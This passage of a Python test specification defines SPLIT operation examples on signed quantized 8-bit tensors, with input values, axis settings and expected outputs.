output2 = Output("output2", "TENSOR_QUANT8_ASYMM_SIGNED", "{2, 1}, 2.0, -125")
model = Model().Operation("SPLIT", input0, axis, num_splits).To(
(output0, output1, output2))
# Example 1.
input_dict = {input0: [-127, -126, -125, -124, -123, -122]}
output_dict = {
output0: [-127, -124],
output1: [-126, -123],
output2: [-125, -122],
}
# Instantiate an example
Example((input_dict, output_dict))
#######################################################
input0 = Input("input0", "TENSOR_QUANT8_ASYMM_SIGNED", "{2, 2, 2}, 1.0, -128")
axis = Int32Scalar("axis", 1)
num_splits = Int32Scalar("num_splits", 2)
output0 = Output("output0", "TENSOR_QUANT8_ASYMM_SIGNED",
"{2, 1, 2}, 1.0, -128")
output1 = Output("output1", "TENSOR_QUANT8_ASYMM_SIGNED",
"{2, 1, 2}, 1.0, -128")
model = Model().Operation("SPLIT", input0, axis, num_splits).To(
(output0, output1))
# Example 1.
input_dict = {input0: [-127, -126, -125, -124, -123, -122, -121, -120]}
output_dict = {
output0: [-127, -126, -123, -122],
output1: [-125, -124, -121, -120],
}
# Instantiate an example
Example((input_dict, output_dict))
|
StarcoderdataPython
|